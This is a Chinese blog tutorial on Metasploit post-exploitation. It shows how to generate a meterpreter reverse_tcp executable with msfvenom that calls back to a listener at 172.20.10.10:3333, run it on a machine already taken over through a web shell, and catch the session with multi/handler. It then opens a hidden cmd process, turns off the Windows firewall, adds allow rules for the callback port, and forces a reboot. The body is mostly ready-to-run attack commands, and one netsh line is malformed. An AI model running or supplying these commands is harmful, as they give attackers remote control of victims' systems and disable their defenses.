首页 > 其他分享 >MSF内网信息收集

MSF内网信息收集

时间:2022-11-10 14:44:59浏览次数:42  
标签:set 机器 收集 防火墙 3333 exe msf MSF 内网

一、msf需要生成一个paylaod,window下面生成一个exe

  sudo ./msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.20.10.10 LPORT=3333 -f exe -o shell.exe

  注意:权限不够用sudo权限  

二、生成的paylaod发送到目标机器让其执行

  假设蚁剑成功得到一台机器,那么将payload一般上传到tmp目录下在终端运行start shell.exe,下面用虚拟机进行测试:

三、msf配置监听    

  msf配置监听之前要配置payload,不然就会连接不上

  现在配置端口

  use exploit/multi/handler
  set LHOST 172.20.10.10
  set LPORT 3333
  Exploit    

  开始监听  

四、msf里面查看获得的机器

  Sessions 序号:选择机器

  选择机器后输入shell 或者execute -f cmd -i -h命令可以进入机器的cmd命令行

    -h:隐藏创建的进程
    -i:通过创建的进程返回一个接口,这个接口就是我们用来操作的接口

  乱码的话,使用chcp,切换代码页

  chcp 65001:Utf-8

五、msf通过shel关闭防火墙

  Netsh advfirewall set allprofiles state off(关闭防火墙)
  Netsh advfirewall show allprofiles (查看防火墙状况)

   通过策略添加防火墙规则规避行为(设置某个端口的行为不被防火墙所约束,相当于加入白名单)

  1、netsh advfirewall set add rule name= "VMWARE" protocol=TCP dir=in localport=3333 action=allow
  2、netsh firewall add portopening TCP 3333 "VMWARE" ENABLE ALL
  重启生效
  Shutdown -r -f -t 0
  -f:强制重启
  -t :时间为0,立即重启


 

 

 

    

 

 

 

 

 

 

 

   

标签:set,机器,收集,防火墙,3333,exe,msf,MSF,内网
From: https://www.cnblogs.com/TT-JZ/p/16876936.html

相关文章

  • Kafka问题收集
    Kafka问题收集kafka分区分配策略干趴面试官系列|请你简述一下Kafka中的分区分配生产者发送消息分区分配策略kafka里的partitioner(分区器)来负责客户端生产层面的负......
  • http 请求头UA收集
    "User-Agent":random.choice(["Mozilla/5.0(WindowsNT10.0;WOW64)",'Mozilla/5.0(WindowsNT6.3;WOW64)',......
  • 「WGCLOUD 」内网中的agent不能直连访问server,通过nginx给server转发上报数据的配置
    有一种场景,我们的server部署在公网,但我们局域网的主机都不能直连访问server比如只有主机A可以连接访问server,那么就可以在主机A部署nginx然后内网中的主机agent都把请求......
  • k8s+log-pilot日志收集
    github地址:https://github.com/AliyunContainerService/log-pilot介绍log-pilot是一个很棒的docker日志工具。可以从dockerlog-pilot主机收集日志并将它们发送到您的......
  • 同时上内网和外网
    几点说明:1本文不涉及原理,只有实战2欢迎指出不足,并补充操作步骤:0重启网卡1通过管理员运行cmd,2 删除旧的路由,不删除的话,会影响我们的配置效果routedelete0.0.0.0......
  • ubuntu20配nginx代理yum源,内网不能上网
    1、yum-server#yum-server外网IP1.1.1.1root@yum-ser:/etc/nginx/sites-available#catdefaultserver{listen80default_server;server_name1.1.1.......
  • 内网搭建DNS服务器
    DNS:DomainNameService,域名解析服务监听端口:udp/53,tcp/53应用程序:bind根域:.一级域:组织域:.com,.org,.net,.mil,.edu,.gov,.info,.cc,.me,.tv国家域:.cn,.us,.uk,......
  • natapp内网穿透
    NATAPP 官网地址https://natapp.cn/ 下载点击下载,选择符合自己的版本 注册下载完成后解压是个natapp.exe程序,这里先不用动,回到官网首页完成注册并登录,选......
  • 微信小程序隐私指引完整填写范本(开发者收集你选中的照片或视频信息,用于?)
    为了分辨用户,开发者将在获取你的明示同意后,收集你的微信昵称、头像。为了显示距离,开发者将在获取你的明示同意后,收集你的位置信息。开发者收集你的地址,用于获取位置信息。......
  • 深入理解JVM - 垃圾收集器
    垃圾回收主要是要解决3件事情:那些内存需要回收?如何回收?什么时候回收?术语解释并行/并发并行(Parallel):指多条垃圾收集线程并行工作,但此时用户线程仍然处于等待状态。并发(Concur......